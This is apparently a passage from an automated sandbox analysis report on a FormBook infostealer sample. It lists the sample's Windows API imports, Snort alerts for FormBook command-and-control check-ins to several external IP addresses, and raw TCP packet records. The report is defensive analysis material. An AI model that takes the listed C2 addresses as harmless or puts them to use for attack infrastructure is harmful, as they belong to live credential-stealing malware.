                                                                                    KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                    USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                    ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    03/18/24-15:09:57.009167TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983180192.168.11.3084.32.84.32
                                                                                    03/18/24-15:09:16.037503TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982180192.168.11.30198.177.123.106
                                                                                    03/18/24-15:09:48.984802TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982880192.168.11.3084.32.84.32
                                                                                    03/18/24-15:10:24.436082TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983980192.168.11.3091.195.240.19
                                                                                    03/18/24-15:08:35.249447TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981080192.168.11.30172.67.130.3
                                                                                    03/18/24-15:10:34.275185TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984080192.168.11.30103.146.179.172
                                                                                    03/18/24-15:10:42.848280TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984380192.168.11.30103.146.179.172
                                                                                    03/18/24-15:10:10.841501TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983580192.168.11.3062.149.128.45
                                                                                    03/18/24-15:09:01.994524TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981780192.168.11.30198.54.117.242
                                                                                    03/18/24-15:10:16.329777TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983680192.168.11.3091.195.240.19
                                                                                    03/18/24-15:10:02.687062TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983280192.168.11.3062.149.128.45
                                                                                    03/18/24-15:08:59.288155TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981680192.168.11.30198.54.117.242
                                                                                    03/18/24-15:09:07.414070TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981980192.168.11.30198.54.117.242
                                                                                    03/18/24-15:10:56.860553TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24984780192.168.11.30109.234.166.81
                                                                                    03/18/24-15:10:48.749151TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984480192.168.11.30109.234.166.81
                                                                                    03/18/24-15:14:44.917245TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34985280192.168.11.30172.67.130.3
                                                                                    03/18/24-15:09:43.418492TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982780192.168.11.30194.191.24.38
                                                                                    03/18/24-15:09:35.300715TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982480192.168.11.30194.191.24.38
                                                                                    03/18/24-15:08:45.740181TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981180192.168.11.3082.180.172.14
                                                                                    03/18/24-15:09:51.666556TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982980192.168.11.3084.32.84.32
                                                                                    03/18/24-15:10:51.453597TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984580192.168.11.30109.234.166.81
                                                                                    03/18/24-15:09:21.447672TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982380192.168.11.30198.177.123.106
                                                                                    03/18/24-15:08:53.774164TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981580192.168.11.3082.180.172.14
                                                                                    03/18/24-15:10:05.405243TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983380192.168.11.3062.149.128.45
                                                                                    03/18/24-15:10:37.130935TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984180192.168.11.30103.146.179.172
                                                                                    03/18/24-15:08:48.415608TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981280192.168.11.3082.180.172.14
                                                                                    03/18/24-15:09:38.013422TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982580192.168.11.30194.191.24.38
                                                                                    03/18/24-15:09:13.346460TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982080192.168.11.30198.177.123.106
                                                                                    03/18/24-15:10:19.031210TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983780192.168.11.3091.195.240.19

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 18, 2024 15:06:50.905170918 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:50.905215025 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:50.905427933 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:50.929414034 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:50.929440975 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.151678085 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.151890993 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.151993990 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.153646946 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.153841972 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.254688978 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.254728079 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.255409002 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.255672932 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.258949995 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.300592899 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.379635096 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.379780054 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.379996061 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.384201050 CET49803443192.168.11.30142.250.65.174
                                                                                    Mar 18, 2024 15:06:51.384241104 CET44349803142.250.65.174192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.524529934 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.524559975 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.524790049 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.525350094 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.525368929 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.730901003 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.731060028 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.731149912 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.735168934 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.735177994 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.735439062 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.735572100 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.735858917 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:51.780570030 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.304682016 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.304877043 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.311016083 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.311327934 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.324528933 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.324774981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.331381083 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.331614971 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.399925947 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.400211096 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.400266886 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.400558949 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.403413057 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.403645039 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.403700113 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.403906107 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.409647942 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.409818888 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.409890890 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.410181046 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.416682959 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.416907072 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.416974068 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.417188883 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.422899008 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.423120022 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.423182011 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.423368931 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.429570913 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.429790974 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.429851055 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.430156946 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.436373949 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.436546087 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.436625957 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.436918974 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.436975956 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.437179089 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.442950010 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.443130016 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.443207026 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.443459034 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.449049950 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.449225903 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.449311972 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.449537992 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.455763102 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.456099987 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.456165075 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.456435919 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.461199999 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.461380005 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.461451054 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.461679935 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.467052937 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.467334986 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.467390060 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.467588902 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.473290920 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.473500967 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.476430893 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.476625919 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.476692915 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.476824045 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.476936102 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.477144003 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.495141983 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.495387077 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.495443106 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.495624065 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.497493029 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.497875929 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.497931957 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.498275995 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.502305031 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.502500057 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.502564907 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.502748013 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.506544113 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.506910086 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.506969929 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.507266045 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.510979891 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.511194944 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.511260033 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.511471987 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.515085936 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.515424013 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.515502930 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.515808105 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.519429922 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.519721031 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.519776106 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.520091057 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.523782015 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.523950100 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.524048090 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.524250984 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.527935982 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.528088093 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.528126001 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.528297901 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.532130003 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.532311916 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.532337904 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.532536983 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.536390066 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.536607981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.536627054 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.536887884 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.540651083 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.540863037 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.542783976 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.543008089 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.543029070 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.543296099 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.547107935 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.547343969 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.547365904 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.547570944 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.551323891 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.551446915 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.551459074 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.551733017 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.555664062 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.556083918 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.556094885 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.556305885 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.559963942 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.560219049 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.560241938 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.560399055 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.564203024 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.564348936 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.564358950 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.564910889 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.568416119 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.568653107 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.568662882 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.568942070 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.572607040 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.572844982 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.572855949 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.573132038 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.576435089 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.576710939 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.576719999 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.576919079 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.580466032 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.580684900 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.580696106 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.580846071 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.584317923 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.584472895 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.584481955 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.584695101 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.588371038 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.588779926 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.588789940 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.588974953 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.592259884 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.592514038 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.594429970 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.594666004 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.594681025 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.594863892 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.598052025 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.598248959 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.598258972 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.598436117 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.602025986 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.602288008 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.602298021 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.602469921 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.604501009 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.604727030 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.604734898 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.604959965 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.606785059 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.607093096 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.607100010 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.607248068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.609292984 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.609484911 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.609496117 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.609671116 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.611639023 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.611813068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.611823082 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.612071991 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.614056110 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.614291906 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.614303112 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.614557981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.616498947 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.616744995 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.616755962 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.616939068 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.618788958 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.618988991 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.618999958 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.619298935 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.621061087 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.621263981 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.621274948 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.621458054 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.623213053 CET44349804142.251.41.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:52.623373032 CET49804443192.168.11.30142.251.41.1
                                                                                    Mar 18, 2024 15:06:52.623384953 CET44349804142.251.41.1192.168.11.30
